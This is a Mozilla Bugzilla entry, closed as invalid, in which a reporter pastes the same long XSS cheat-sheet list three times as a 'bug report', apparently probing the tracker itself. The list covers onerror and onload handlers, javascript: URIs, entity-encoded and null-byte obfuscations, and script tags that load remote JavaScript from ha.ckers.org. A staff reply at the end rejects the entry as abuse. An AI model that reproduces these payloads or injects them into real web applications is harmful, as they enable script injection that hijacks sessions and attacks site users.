Status

RESOLVED INVALID
3 years ago
3 years ago

People

(Reporter: Wereforaten1954, Unassigned)

Tracking

Details

Attachments

(1 attachment)

(Reporter)

Description

3 years ago
Created attachment 8750042 [details]
#><img src=x onerror=prompt(1)>.csv

User Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36 OPR/37.0.2178.32

Steps to reproduce:

'+prompt(/XSSPOSSED/)+'
"><img src=x onerror=prompt(1)>

"onmouseover="confirm(document.domain);""

	<body onload=prompt("Hmz")>



';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
----------------------------------------------------------------------
'';!--"&lt;XSS&gt;=&amp;{()}
----------------------------------------------------------------------
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
----------------------------------------------------------------------
&lt;IMG SRC="javascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;IMG SRC=javascript:alert('XSS')&gt;
----------------------------------------------------------------------
&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;
----------------------------------------------------------------------
&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;
----------------------------------------------------------------------
&lt;IMG SRC=`javascript:alert("RSnake says, 'XSS'")`&gt;
----------------------------------------------------------------------
&lt;IMG """&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;
----------------------------------------------------------------------
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
----------------------------------------------------------------------
&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
----------------------------------------------------------------------
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
----------------------------------------------------------------------
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
----------------------------------------------------------------------
&lt;IMG SRC="jav&#x09;ascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;IMG SRC="jav&amp;#x09;ascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;IMG SRC="jav&amp;#x0A;ascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;IMG SRC="jav&amp;#x0D;ascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;IMG&#x0D;SRC&#x0D;=&#x0D;"&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;'&#x0D;X&#x0D;S&#x0D;S&#x0D;'&#x0D;)&#x0D;"&#x0D;>&#x0D;
----------------------------------------------------------------------
perl -e 'print "&lt;IMG SRC=java\0script:alert(\"XSS\")&gt;";' &gt; out
----------------------------------------------------------------------
perl -e 'print "&lt;SCR\0IPT&gt;alert(\"XSS\")&lt;/SCR\0IPT&gt;";' &gt; out
----------------------------------------------------------------------
&lt;IMG SRC=" &amp;#14;  javascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
----------------------------------------------------------------------
&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")&gt;
----------------------------------------------------------------------
&lt;SCRIPT/SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
----------------------------------------------------------------------
&lt;&lt;SCRIPT&gt;alert("XSS");//&lt;&lt;/SCRIPT&gt;
----------------------------------------------------------------------
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;
----------------------------------------------------------------------
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
----------------------------------------------------------------------
&lt;IMG SRC="javascript:alert('XSS')"
----------------------------------------------------------------------
&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;
----------------------------------------------------------------------
&lt;SCRIPT&gt;a=/XSS/

alert(a.source)&lt;/SCRIPT&gt;
----------------------------------------------------------------------
\";alert('XSS');//
----------------------------------------------------------------------
&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;
----------------------------------------------------------------------
&lt;INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;BODY BACKGROUND="javascript:alert('XSS')"&gt;
----------------------------------------------------------------------
&lt;BODY ONLOAD=alert('XSS')&gt;
----------------------------------------------------------------------
&lt;IMG LOWSRC="javascript:alert('XSS')"&gt;
----------------------------------------------------------------------
&lt;BGSOUND SRC="javascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;BR SIZE="&{alert('XSS')}"&gt;
----------------------------------------------------------------------
&lt;LAYER SRC="http://ha.ckers.org/scriptlet.html"&gt;&lt;/LAYER&gt;
----------------------------------------------------------------------
&lt;LINK REL="stylesheet" HREF="javascript:alert('XSS');"&gt;


Actual results:

'+prompt(/XSSPOSSED/)+'
"><img src=x onerror=prompt(1)>

"onmouseover="confirm(document.domain);""

	<body onload=prompt("Hmz")>



';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
----------------------------------------------------------------------
'';!--"&lt;XSS&gt;=&amp;{()}
----------------------------------------------------------------------
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
----------------------------------------------------------------------
&lt;IMG SRC="javascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;IMG SRC=javascript:alert('XSS')&gt;
----------------------------------------------------------------------
&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;
----------------------------------------------------------------------
&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;
----------------------------------------------------------------------
&lt;IMG SRC=`javascript:alert("RSnake says, 'XSS'")`&gt;
----------------------------------------------------------------------
&lt;IMG """&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;
----------------------------------------------------------------------
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
----------------------------------------------------------------------
&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
----------------------------------------------------------------------
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
----------------------------------------------------------------------
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
----------------------------------------------------------------------
&lt;IMG SRC="jav&#x09;ascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;IMG SRC="jav&amp;#x09;ascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;IMG SRC="jav&amp;#x0A;ascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;IMG SRC="jav&amp;#x0D;ascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;IMG&#x0D;SRC&#x0D;=&#x0D;"&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;'&#x0D;X&#x0D;S&#x0D;S&#x0D;'&#x0D;)&#x0D;"&#x0D;>&#x0D;
----------------------------------------------------------------------
perl -e 'print "&lt;IMG SRC=java\0script:alert(\"XSS\")&gt;";' &gt; out
----------------------------------------------------------------------
perl -e 'print "&lt;SCR\0IPT&gt;alert(\"XSS\")&lt;/SCR\0IPT&gt;";' &gt; out
----------------------------------------------------------------------
&lt;IMG SRC=" &amp;#14;  javascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
----------------------------------------------------------------------
&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")&gt;
----------------------------------------------------------------------
&lt;SCRIPT/SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
----------------------------------------------------------------------
&lt;&lt;SCRIPT&gt;alert("XSS");//&lt;&lt;/SCRIPT&gt;
----------------------------------------------------------------------
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;
----------------------------------------------------------------------
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
----------------------------------------------------------------------
&lt;IMG SRC="javascript:alert('XSS')"
----------------------------------------------------------------------
&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;
----------------------------------------------------------------------
&lt;SCRIPT&gt;a=/XSS/

alert(a.source)&lt;/SCRIPT&gt;
----------------------------------------------------------------------
\";alert('XSS');//
----------------------------------------------------------------------
&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;
----------------------------------------------------------------------
&lt;INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;BODY BACKGROUND="javascript:alert('XSS')"&gt;
----------------------------------------------------------------------
&lt;BODY ONLOAD=alert('XSS')&gt;
----------------------------------------------------------------------
&lt;IMG LOWSRC="javascript:alert('XSS')"&gt;
----------------------------------------------------------------------
&lt;BGSOUND SRC="javascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;BR SIZE="&{alert('XSS')}"&gt;
----------------------------------------------------------------------
&lt;LAYER SRC="http://ha.ckers.org/scriptlet.html"&gt;&lt;/LAYER&gt;
----------------------------------------------------------------------
&lt;LINK REL="stylesheet" HREF="javascript:alert('XSS');"&gt;


Expected results:

'+prompt(/XSSPOSSED/)+'
"><img src=x onerror=prompt(1)>

"onmouseover="confirm(document.domain);""

	<body onload=prompt("Hmz")>



';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
----------------------------------------------------------------------
'';!--"&lt;XSS&gt;=&amp;{()}
----------------------------------------------------------------------
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
----------------------------------------------------------------------
&lt;IMG SRC="javascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;IMG SRC=javascript:alert('XSS')&gt;
----------------------------------------------------------------------
&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;
----------------------------------------------------------------------
&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;
----------------------------------------------------------------------
&lt;IMG SRC=`javascript:alert("RSnake says, 'XSS'")`&gt;
----------------------------------------------------------------------
&lt;IMG """&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;
----------------------------------------------------------------------
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
----------------------------------------------------------------------
&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
----------------------------------------------------------------------
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
----------------------------------------------------------------------
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
----------------------------------------------------------------------
&lt;IMG SRC="jav&#x09;ascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;IMG SRC="jav&amp;#x09;ascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;IMG SRC="jav&amp;#x0A;ascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;IMG SRC="jav&amp;#x0D;ascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;IMG&#x0D;SRC&#x0D;=&#x0D;"&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;'&#x0D;X&#x0D;S&#x0D;S&#x0D;'&#x0D;)&#x0D;"&#x0D;>&#x0D;
----------------------------------------------------------------------
perl -e 'print "&lt;IMG SRC=java\0script:alert(\"XSS\")&gt;";' &gt; out
----------------------------------------------------------------------
perl -e 'print "&lt;SCR\0IPT&gt;alert(\"XSS\")&lt;/SCR\0IPT&gt;";' &gt; out
----------------------------------------------------------------------
&lt;IMG SRC=" &amp;#14;  javascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
----------------------------------------------------------------------
&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")&gt;
----------------------------------------------------------------------
&lt;SCRIPT/SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt;
----------------------------------------------------------------------
&lt;&lt;SCRIPT&gt;alert("XSS");//&lt;&lt;/SCRIPT&gt;
----------------------------------------------------------------------
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;
----------------------------------------------------------------------
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
----------------------------------------------------------------------
&lt;IMG SRC="javascript:alert('XSS')"
----------------------------------------------------------------------
&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;
----------------------------------------------------------------------
&lt;SCRIPT&gt;a=/XSS/

alert(a.source)&lt;/SCRIPT&gt;
----------------------------------------------------------------------
\";alert('XSS');//
----------------------------------------------------------------------
&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;
----------------------------------------------------------------------
&lt;INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;BODY BACKGROUND="javascript:alert('XSS')"&gt;
----------------------------------------------------------------------
&lt;BODY ONLOAD=alert('XSS')&gt;
----------------------------------------------------------------------
&lt;IMG LOWSRC="javascript:alert('XSS')"&gt;
----------------------------------------------------------------------
&lt;BGSOUND SRC="javascript:alert('XSS');"&gt;
----------------------------------------------------------------------
&lt;BR SIZE="&{alert('XSS')}"&gt;
----------------------------------------------------------------------
&lt;LAYER SRC="http://ha.ckers.org/scriptlet.html"&gt;&lt;/LAYER&gt;
----------------------------------------------------------------------
&lt;LINK REL="stylesheet" HREF="javascript:alert('XSS');"&gt;

Comment 1

3 years ago
This is a production bug database used by the Mozilla community to develop Firefox, and other products.
It is not a test system or something to play with.
Please use http://landfill.bugzilla.org/ if you want to test things.
If you continue to abuse bugzilla.mozilla.org your account will be disabled.

If you really wanted to report a valid bug in one of Mozilla's application and services, please read please https://developer.mozilla.org/en-US/docs/Mozilla/QA/Bug_writing_guidelines and create a bug report with a way better and useful description.
Status: UNCONFIRMED → RESOLVED
Last Resolved: 3 years ago
Component: Build Config → General
Product: Thunderbird → Invalid Bugs
Resolution: --- → INVALID
Version: 1.0 → unspecified
You need to log in before you can comment on or make changes to this bug.